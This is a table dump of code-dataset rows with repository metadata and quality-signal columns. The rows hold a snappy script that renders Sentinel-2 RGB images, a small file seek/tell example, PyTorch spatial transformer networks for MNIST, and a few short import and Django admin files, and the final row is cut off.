hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
740cd479d103bcb29d6d4137d552bd2d9ce84e8c | 10,005 | py | Python | scripts/eo_plot_snap.py | Zeitsperre/flyingpigeon | 678370bf428af7ffe11ee79be3b8a89c73215e5e | [
"Apache-2.0"
] | 1 | 2016-12-04T18:01:49.000Z | 2016-12-04T18:01:49.000Z | scripts/eo_plot_snap.py | Zeitsperre/flyingpigeon | 678370bf428af7ffe11ee79be3b8a89c73215e5e | [
"Apache-2.0"
] | 13 | 2017-03-16T15:44:21.000Z | 2019-08-19T16:56:04.000Z | scripts/eo_plot_snap.py | Zeitsperre/flyingpigeon | 678370bf428af7ffe11ee79be3b8a89c73215e5e | [
"Apache-2.0"
] | null | null | null | # from snappy import Product
# from snappy import ProductData
# import snappy
#
# import numpy
# import sys
# from snappy import String
def plot_RGB(basedir):
    from snappy import ProductIO
    from snappy import ProductUtils
    from snappy import ProgressMonitor
    from snappy import jpy
    from os.path import join
    from tempfile import mkstemp
    mtd = 'MTD_MSIL1C.xml'
    _, rgb_image = mkstemp(dir='.', prefix='RGB', suffix='.png')
    source = join(basedir, mtd)
    sourceProduct = ProductIO.readProduct(source)
    b2 = sourceProduct.getBand('B2')
    b3 = sourceProduct.getBand('B3')
    b4 = sourceProduct.getBand('B4')
    Color = jpy.get_type('java.awt.Color')
    ColorPoint = jpy.get_type('org.esa.snap.core.datamodel.ColorPaletteDef$Point')
    ColorPaletteDef = jpy.get_type('org.esa.snap.core.datamodel.ColorPaletteDef')
    ImageInfo = jpy.get_type('org.esa.snap.core.datamodel.ImageInfo')
    ImageLegend = jpy.get_type('org.esa.snap.core.datamodel.ImageLegend')
    ImageManager = jpy.get_type('org.esa.snap.core.image.ImageManager')
    JAI = jpy.get_type('javax.media.jai.JAI')
    RenderedImage = jpy.get_type('java.awt.image.RenderedImage')
    # Disable JAI native MediaLib extensions
    System = jpy.get_type('java.lang.System')
    System.setProperty('com.sun.media.jai.disableMediaLib', 'true')
    #
    legend = ImageLegend(b2.getImageInfo(), b2)
    legend.setHeaderText(b2.getName())
    # red = product.getBand('B4')
    # green = product.getBand('B3')
    # blue = product.getBand('B2')
    image_info = ProductUtils.createImageInfo([b4, b3, b2], True, ProgressMonitor.NULL)
    im = ImageManager.getInstance().createColoredBandImage([b4, b3, b2], image_info, 0)
    JAI.create("filestore", im, rgb_image, 'PNG')
    return rgb_image
basedir = '/home/nils/birdhouse/var/lib/pywps/cache/flyingpigeon/scihub.copernicus/S2A_MSIL1C_20170119T092311_N0204_R093_T33PVK_20170119T093234.SAFE/'
plot_RGB(basedir)
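`plot_RGB` above names its output file with `tempfile.mkstemp`; a minimal self-contained sketch of that naming pattern (no SNAP/snappy dependency; it uses the default temp directory rather than `dir='.'`):

```python
import os
from tempfile import mkstemp

# mkstemp returns an open OS-level file descriptor plus the generated
# unique path; close the descriptor since only the path is needed here.
fd, rgb_image = mkstemp(prefix='RGB', suffix='.png')
os.close(fd)
print(rgb_image)
os.remove(rgb_image)
```

The descriptor must be closed (or wrapped with `os.fdopen`) to avoid leaking a file handle; `mkstemp` does not delete the file for you.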
#
# source = '/home/nils/birdhouse/var/lib/pywps/cache/flyingpigeon/scihub.copernicus/S2A_MSIL1C_20170119T092311_N0204_R093_T33PVK_20170119T093234.SAFE/MTD_MSIL1C.xml'
# sourceProduct = ProductIO.readProduct(source)
# sourceProduct.getBandNames()
#
# b2 = sourceProduct.getBand('B2')
# b3 = sourceProduct.getBand('B3')
# b4 = sourceProduct.getBand('B4')
# #
# jpy = snappy.jpy
#
# # More Java type definitions required for image generation
# Color = jpy.get_type('java.awt.Color')
# ColorPoint = jpy.get_type('org.esa.snap.core.datamodel.ColorPaletteDef$Point')
# ColorPaletteDef = jpy.get_type('org.esa.snap.core.datamodel.ColorPaletteDef')
# ImageInfo = jpy.get_type('org.esa.snap.core.datamodel.ImageInfo')
# ImageLegend = jpy.get_type('org.esa.snap.core.datamodel.ImageLegend')
# ImageManager = jpy.get_type('org.esa.snap.core.image.ImageManager')
# JAI = jpy.get_type('javax.media.jai.JAI')
# RenderedImage = jpy.get_type('java.awt.image.RenderedImage')
#
# # Disable JAI native MediaLib extensions
# System = jpy.get_type('java.lang.System')
# System.setProperty('com.sun.media.jai.disableMediaLib', 'true')
#
# def write_image(band, filename, format):
# im = ImageManager.getInstance().createColoredBandImage([band], band.getImageInfo(), 0)
# JAI.create("filestore", im, filename, format)
#
# def write_rgb_image(bands, filename, format):
# image_info = ProductUtils.createImageInfo(bands, True, ProgressMonitor.NULL)
# im = ImageManager.getInstance().createColoredBandImage(bands, image_info, 0)
# JAI.create("filestore", im, filename, format)
#
# # points = [ColorPoint(0.0, Color.YELLOW),
# # ColorPoint(50.0, Color.RED),
# # ColorPoint(100.0, Color.BLUE)]
# # cpd = ColorPaletteDef(points)
# # ii = ImageInfo(cpd)
# # b2.setImageInfo(ii)
# #
# image_format = 'PNG'
#
# # write_image(b2, 'snappy_image.png', image_format)
# # legend_image = legend.createImage()
# #
# # # This cast is needed because otherwise jpy can't evaluate which method to call
# # # This is considered an issue of jpy (https://github.com/bcdev/jpy/issues/89)
# # rendered_legend_image = jpy.cast(legend_image, RenderedImage)
# # JAI.create("filestore", rendered_legend_image, 'snappy_write_image_legend.png', image_format)
# #
# legend = ImageLegend(b2.getImageInfo(), b2)
# legend.setHeaderText(b2.getName())
#
# # red = product.getBand('B4')
# # green = product.getBand('B3')
# # blue = product.getBand('B2')
#
# write_rgb_image([b4, b3, b2], 'snappy_write_image_rgb.png', image_format)
# #
# # #legend.setOrientation(ImageLegend.HORIZONTAL) # or ImageLegend.VERTICAL
# #legend.setFont(legend.getFont().deriveFont(14))
# #legend.setBackgroundColor(Color.CYAN)
# #legend.setForegroundColor(Color.ORANGE);
# #legend.setBackgroundTransparency(0.7);
# #legend.setBackgroundTransparencyEnabled(True);
# #legend.setAntialiasing(True);
#
# legend_image = legend.createImage()
#
# # This cast is needed because otherwise jpy can't evaluate which method to call
# # This is considered an issue of jpy (https://github.com/bcdev/jpy/issues/89)
# rendered_legend_image = jpy.cast(legend_image, RenderedImage)
# JAI.create("filestore", rendered_legend_image, 'snappy_write_image_legend.png', image_format)
#
# red = product.getBand('B4')
# green = product.getBand('B3')
# blue = product.getBand('B2')
# write_rgb_image([red, green, blue], 'snappy_write_image_rgb.png', image_format)
#
# # This cast is needed because otherwise jpy can't evaluate which method to call
# # This is considered an issue of jpy (https://github.com/bcdev/jpy/issues/89)
# rendered_legend_image = jpy.cast(legend_image, RenderedImage)
# JAI.create("filestore", rendered_legend_image, 'snappy_write_image_legend.png', image_format)
#
# red = sourceProduct.getBand('B4')
# green = sourceProduct.getBand('B3')
# blue = sourceProduct.getBand('B2')
# write_rgb_image([red, green, blue], 'snappy_write_image_rgb.png', image_format)
#
# # This cast is needed because otherwise jpy can't evaluate which method to call
# # This is considered an issue of jpy (https://github.com/bcdev/jpy/issues/89)
# rendered_legend_image = jpy.cast(legend_image, RenderedImage)
# JAI.create("filestore", rendered_legend_image, 'snappy_write_image_legend.png', image_format)
#
# red = sourceProduct.getBand('B4')
# green = sourceProduct.getBand('B3')
# blue = sourceProduct.getBand('B2')
# write_rgb_image([red, green, blue], 'snappy_write_image_rgb.png', image_format)
#
# import snappy
# import sys
# from snappy import (ProductIO, ProductUtils, ProgressMonitor)
#
# # if len(sys.argv) != 2:
# # print("usage: %s <file>" % sys.argv[0])
# # sys.exit(1)
# #
# # file = sys.argv[1]
#
#
# # import rasterio
# # import numpy as np
# from os import path, listdir
# # from tempfile import mkstemp
# # from osgeo import gdal
# # # import os, rasterio
# import glob
# # import subprocess
#
# basedir = '/home/nils/birdhouse/var/lib/pywps/cache/flyingpigeon/scihub.copernicus/S2A_MSIL1C_20170119T092311_N0204_R093_T33PVK_20170119T093234.SAFE/'
#
# prefix = path.basename(path.normpath(basedir)).split('.')[0]
#
# jps = []
# fname = basedir.split('/')[-1]
# ID = fname.replace('.SAFE','')
#
# for filename in glob.glob(basedir + '/GRANULE/*/IMG_DATA/*jp2'):
# jps.append(filename)
#
# jp_B04 = [jp for jp in jps if '_B04.jp2' in jp][0]
# jp_B08 = [jp for jp in jps if '_B08.jp2' in jp][0]
#
#
#
# jpy = snappy.jpy
#
# # More Java type definitions required for image generation
# Color = jpy.get_type('java.awt.Color')
# ColorPoint = jpy.get_type('org.esa.snap.core.datamodel.ColorPaletteDef$Point')
# ColorPaletteDef = jpy.get_type('org.esa.snap.core.datamodel.ColorPaletteDef')
# ImageInfo = jpy.get_type('org.esa.snap.core.datamodel.ImageInfo')
# ImageLegend = jpy.get_type('org.esa.snap.core.datamodel.ImageLegend')
# ImageManager = jpy.get_type('org.esa.snap.core.image.ImageManager')
# JAI = jpy.get_type('javax.media.jai.JAI')
# RenderedImage = jpy.get_type('java.awt.image.RenderedImage')
#
#
# # Disable JAI native MediaLib extensions
# System = jpy.get_type('java.lang.System')
# System.setProperty('com.sun.media.jai.disableMediaLib', 'true')
#
# def write_image(band, filename, format):
# im = ImageManager.getInstance().createColoredBandImage([band], band.getImageInfo(), 0)
# JAI.create("filestore", im, filename, format)
#
# def write_rgb_image(bands, filename, format):
# image_info = ProductUtils.createImageInfo(bands, True, ProgressMonitor.NULL)
# im = ImageManager.getInstance().createColoredBandImage(bands, image_info, 0)
# JAI.create("filestore", im, filename, format)
#
# product = ProductIO.readProduct(file)
# band = product.getBand('radiance_13')
#
# # The colour palette assigned to pixel values 0, 50, 100 in the band's geophysical units
# points = [ColorPoint(0.0, Color.YELLOW),
# ColorPoint(50.0, Color.RED),
# ColorPoint(100.0, Color.BLUE)]
# cpd = ColorPaletteDef(points)
# ii = ImageInfo(cpd)
# band.setImageInfo(ii)
#
# image_format = 'PNG'
# write_image(band, 'snappy_image.png', image_format)
#
# legend = ImageLegend(band.getImageInfo(), band)
# legend.setHeaderText(band.getName())
#
# #legend.setOrientation(ImageLegend.HORIZONTAL) # or ImageLegend.VERTICAL
# #legend.setFont(legend.getFont().deriveFont(14))
# #legend.setBackgroundColor(Color.CYAN)
# #legend.setForegroundColor(Color.ORANGE);
# #legend.setBackgroundTransparency(0.7);
# #legend.setBackgroundTransparencyEnabled(True);
# #legend.setAntialiasing(True);
#
# legend_image = legend.createImage()
#
# # This cast is needed because otherwise jpy can't evaluate which method to call
# # This is considered an issue of jpy (https://github.com/bcdev/jpy/issues/89)
# rendered_legend_image = jpy.cast(legend_image, RenderedImage)
# JAI.create("filestore", rendered_legend_image, 'snappy_write_image_legend.png', image_format)
#
# red = product.getBand('radiance_13')
# green = product.getBand('radiance_5')
# blue = product.getBand('radiance_1')
# write_rgb_image([red, green, blue], 'snappy_write_image_rgb.png', image_format)
| 38.187023 | 165 | 0.730135 | 1,291 | 10,005 | 5.534469 | 0.158792 | 0.022673 | 0.037789 | 0.027292 | 0.83177 | 0.823233 | 0.811477 | 0.782225 | 0.782225 | 0.782225 | 0 | 0.026781 | 0.122939 | 10,005 | 261 | 166 | 38.333333 | 0.787464 | 0.781909 | 0 | 0 | 0 | 0.03125 | 0.260094 | 0.211327 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0 | 0.1875 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
742287123f9913486498681afacff27ae771606f | 172 | py | Python | example_8.py | iljuhas7/lab-15 | 4d82ff5594193f2d45b7f0a53826ccd5df1b3e5c | [
"MIT"
] | null | null | null | example_8.py | iljuhas7/lab-15 | 4d82ff5594193f2d45b7f0a53826ccd5df1b3e5c | [
"MIT"
] | null | null | null | example_8.py | iljuhas7/lab-15 | 4d82ff5594193f2d45b7f0a53826ccd5df1b3e5c | [
"MIT"
] | null | null | null | with open("file2.txt", "r") as TextIO:
    print("The file object is at byte:", TextIO.tell())
    TextIO.seek(10)
    print("After seeking, the file object is at:", TextIO.tell())
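The script above depends on `tell()` reporting the current byte offset and `seek()` moving it without reading; a self-contained sketch using a throwaway file of known contents (not part of the original example):

```python
import os
import tempfile

# Write a file with known contents so the byte offsets are predictable.
fd, path = tempfile.mkstemp(suffix=".txt")
with os.fdopen(fd, "w") as f:
    f.write("0123456789abcdefghij")

with open(path, "r") as f:
    start = f.tell()        # a freshly opened file starts at byte 0
    f.seek(10)              # jump straight to byte 10 without reading
    after_seek = f.tell()
    chunk = f.read(5)       # reading advances the offset past the seek point

os.remove(path)
print(start, after_seek, chunk)
```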
| 34.4 | 60 | 0.633721 | 27 | 172 | 4.037037 | 0.62963 | 0.165138 | 0.201835 | 0.238532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021429 | 0.186047 | 172 | 4 | 61 | 43 | 0.757143 | 0 | 0 | 0 | 0 | 0 | 0.377907 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
74323849c3f35de92af8dc2c05f55298519ad52b | 4,861 | py | Python | MNIST-pytorch/graph.py | LaudateCorpus1/inverse-compositional-STN | 4a2a8fc7b9a1e3f6788bd0037eacf248f3abf76b | [
"MIT"
] | 201 | 2018-03-01T01:06:49.000Z | 2022-03-08T07:57:19.000Z | MNIST-pytorch/graph.py | LaudateCorpus1/inverse-compositional-STN | 4a2a8fc7b9a1e3f6788bd0037eacf248f3abf76b | [
"MIT"
] | 11 | 2018-03-15T17:06:52.000Z | 2020-05-18T16:40:15.000Z | MNIST-pytorch/graph.py | LaudateCorpus1/inverse-compositional-STN | 4a2a8fc7b9a1e3f6788bd0037eacf248f3abf76b | [
"MIT"
] | 48 | 2018-03-06T21:12:34.000Z | 2021-11-30T04:15:35.000Z | import numpy as np
import torch
import time
import data, warp, util
# build classification network
class FullCNN(torch.nn.Module):
    def __init__(self,opt):
        super(FullCNN,self).__init__()
        self.inDim = 1
        def conv2Layer(outDim):
            conv = torch.nn.Conv2d(self.inDim,outDim,kernel_size=[3,3],stride=1,padding=0)
            self.inDim = outDim
            return conv
        def linearLayer(outDim):
            fc = torch.nn.Linear(self.inDim,outDim)
            self.inDim = outDim
            return fc
        def maxpoolLayer(): return torch.nn.MaxPool2d([2,2],stride=2)
        self.conv2Layers = torch.nn.Sequential(
            conv2Layer(3),torch.nn.ReLU(True),
            conv2Layer(6),torch.nn.ReLU(True),maxpoolLayer(),
            conv2Layer(9),torch.nn.ReLU(True),
            conv2Layer(12),torch.nn.ReLU(True)
        )
        self.inDim *= 8**2
        self.linearLayers = torch.nn.Sequential(
            linearLayer(48),torch.nn.ReLU(True),
            linearLayer(opt.labelN)
        )
        initialize(opt,self,opt.stdC)
    def forward(self,opt,image):
        feat = image
        feat = self.conv2Layers(feat).reshape(opt.batchSize,-1)
        feat = self.linearLayers(feat)
        output = feat
        return output
# build classification network
class CNN(torch.nn.Module):
    def __init__(self,opt):
        super(CNN,self).__init__()
        self.inDim = 1
        def conv2Layer(outDim):
            conv = torch.nn.Conv2d(self.inDim,outDim,kernel_size=[9,9],stride=1,padding=0)
            self.inDim = outDim
            return conv
        def linearLayer(outDim):
            fc = torch.nn.Linear(self.inDim,outDim)
            self.inDim = outDim
            return fc
        def maxpoolLayer(): return torch.nn.MaxPool2d([2,2],stride=2)
        self.conv2Layers = torch.nn.Sequential(
            conv2Layer(3),torch.nn.ReLU(True)
        )
        self.inDim *= 20**2
        self.linearLayers = torch.nn.Sequential(
            linearLayer(opt.labelN)
        )
        initialize(opt,self,opt.stdC)
    def forward(self,opt,image):
        feat = image
        feat = self.conv2Layers(feat).reshape(opt.batchSize,-1)
        feat = self.linearLayers(feat)
        output = feat
        return output
# an identity class to skip geometric predictors
class Identity(torch.nn.Module):
    def __init__(self): super(Identity,self).__init__()
    def forward(self,opt,feat): return [feat]
# build Spatial Transformer Network
class STN(torch.nn.Module):
    def __init__(self,opt):
        super(STN,self).__init__()
        self.inDim = 1
        def conv2Layer(outDim):
            conv = torch.nn.Conv2d(self.inDim,outDim,kernel_size=[7,7],stride=1,padding=0)
            self.inDim = outDim
            return conv
        def linearLayer(outDim):
            fc = torch.nn.Linear(self.inDim,outDim)
            self.inDim = outDim
            return fc
        def maxpoolLayer(): return torch.nn.MaxPool2d([2,2],stride=2)
        self.conv2Layers = torch.nn.Sequential(
            conv2Layer(4),torch.nn.ReLU(True),
            conv2Layer(8),torch.nn.ReLU(True),maxpoolLayer()
        )
        self.inDim *= 8**2
        self.linearLayers = torch.nn.Sequential(
            linearLayer(48),torch.nn.ReLU(True),
            linearLayer(opt.warpDim)
        )
        initialize(opt,self,opt.stdGP,last0=True)
    def forward(self,opt,image):
        imageWarpAll = [image]
        feat = image
        feat = self.conv2Layers(feat).reshape(opt.batchSize,-1)
        feat = self.linearLayers(feat)
        p = feat
        pMtrx = warp.vec2mtrx(opt,p)
        imageWarp = warp.transformImage(opt,image,pMtrx)
        imageWarpAll.append(imageWarp)
        return imageWarpAll
# build Inverse Compositional STN
class ICSTN(torch.nn.Module):
    def __init__(self,opt):
        super(ICSTN,self).__init__()
        self.inDim = 1
        def conv2Layer(outDim):
            conv = torch.nn.Conv2d(self.inDim,outDim,kernel_size=[7,7],stride=1,padding=0)
            self.inDim = outDim
            return conv
        def linearLayer(outDim):
            fc = torch.nn.Linear(self.inDim,outDim)
            self.inDim = outDim
            return fc
        def maxpoolLayer(): return torch.nn.MaxPool2d([2,2],stride=2)
        self.conv2Layers = torch.nn.Sequential(
            conv2Layer(4),torch.nn.ReLU(True),
            conv2Layer(8),torch.nn.ReLU(True),maxpoolLayer()
        )
        self.inDim *= 8**2
        self.linearLayers = torch.nn.Sequential(
            linearLayer(48),torch.nn.ReLU(True),
            linearLayer(opt.warpDim)
        )
        initialize(opt,self,opt.stdGP,last0=True)
    def forward(self,opt,image,p):
        imageWarpAll = []
        for l in range(opt.warpN):
            pMtrx = warp.vec2mtrx(opt,p)
            imageWarp = warp.transformImage(opt,image,pMtrx)
            imageWarpAll.append(imageWarp)
            feat = imageWarp
            feat = self.conv2Layers(feat).reshape(opt.batchSize,-1)
            feat = self.linearLayers(feat)
            dp = feat
            p = warp.compose(opt,p,dp)
        pMtrx = warp.vec2mtrx(opt,p)
        imageWarp = warp.transformImage(opt,image,pMtrx)
        imageWarpAll.append(imageWarp)
        return imageWarpAll
# initialize weights/biases
def initialize(opt,model,stddev,last0=False):
    for m in model.conv2Layers:
        if isinstance(m,torch.nn.Conv2d):
            m.weight.data.normal_(0,stddev)
            m.bias.data.normal_(0,stddev)
    for m in model.linearLayers:
        if isinstance(m,torch.nn.Linear):
            if last0 and m is model.linearLayers[-1]:
                m.weight.data.zero_()
                m.bias.data.zero_()
            else:
                m.weight.data.normal_(0,stddev)
                m.bias.data.normal_(0,stddev)
| 30.006173 | 81 | 0.714873 | 698 | 4,861 | 4.906877 | 0.153295 | 0.079708 | 0.070073 | 0.052555 | 0.821606 | 0.791825 | 0.77781 | 0.767883 | 0.730511 | 0.730511 | 0 | 0.024976 | 0.143386 | 4,861 | 161 | 82 | 30.192547 | 0.79755 | 0.040321 | 0 | 0.677852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.154362 | false | 0 | 0.026846 | 0.033557 | 0.295302 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7455cca9f57192cfcea3b1d7f6e362fbb0028afd | 39 | py | Python | dlocr/ctpn/lib/__init__.py | HandsomeBrotherShuaiLi/ChineseCalligraphyDetection | 19c80ac6be272f8cf2552c9281548554c063d5c7 | [
"Apache-2.0"
] | 277 | 2018-11-14T06:15:34.000Z | 2022-02-05T15:20:40.000Z | dlocr/ctpn/lib/__init__.py | dun933/text-detection-ocr | 9bb9efd4a0a7af7d1a9a6784450d1843ffe15d8a | [
"Apache-2.0"
] | 31 | 2018-11-19T09:47:05.000Z | 2021-05-18T16:36:42.000Z | dlocr/ctpn/lib/__init__.py | dun933/text-detection-ocr | 9bb9efd4a0a7af7d1a9a6784450d1843ffe15d8a | [
"Apache-2.0"
] | 116 | 2018-11-14T06:15:37.000Z | 2022-03-17T09:09:42.000Z | from dlocr.ctpn.lib.other import Graph
| 19.5 | 38 | 0.820513 | 7 | 39 | 4.571429 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
74a560a8dde48041b01976f0b15d374c44e9da9a | 40 | py | Python | utils/__init__.py | PineappleRind/utilitybot | 9aab759280abf0e7d958d2daedb6a272bb3b2f71 | [
"MIT"
] | 13 | 2020-08-13T12:54:17.000Z | 2021-12-28T10:48:50.000Z | utils/__init__.py | PineappleRind/utilitybot | 9aab759280abf0e7d958d2daedb6a272bb3b2f71 | [
"MIT"
] | 43 | 2020-08-11T02:00:59.000Z | 2021-02-15T17:09:19.000Z | utils/__init__.py | PineappleRind/utilitybot | 9aab759280abf0e7d958d2daedb6a272bb3b2f71 | [
"MIT"
] | 24 | 2020-08-17T20:09:54.000Z | 2022-03-23T23:50:44.000Z | from .permissions import has_permission
| 20 | 39 | 0.875 | 5 | 40 | 6.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 40 | 1 | 40 | 40 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
74aad272eff97079307b2fb097515d98075a5e3e | 242 | py | Python | annotation/admin.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | 5 | 2021-01-14T03:34:42.000Z | 2022-03-07T15:34:18.000Z | annotation/admin.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | 551 | 2020-10-19T00:02:38.000Z | 2022-03-30T02:18:22.000Z | annotation/admin.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | null | null | null | from django.contrib import admin
from annotation import models
admin.site.register(models.AnnotationRun)
admin.site.register(models.AnnotationVersion)
admin.site.register(models.ClinVar)
admin.site.register(models.VariantAnnotationVersion)
| 26.888889 | 52 | 0.855372 | 29 | 242 | 7.137931 | 0.448276 | 0.173913 | 0.328502 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057851 | 242 | 8 | 53 | 30.25 | 0.907895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
7792c2174051f896a88a670e242289e198545f95 | 43 | py | Python | testsuite/data/scores/multisig_wallet/__init__.py | JINWOO-J/goloop | 7a3dc346493dda7dd913df49cd7feb4edd991995 | [
"Apache-2.0"
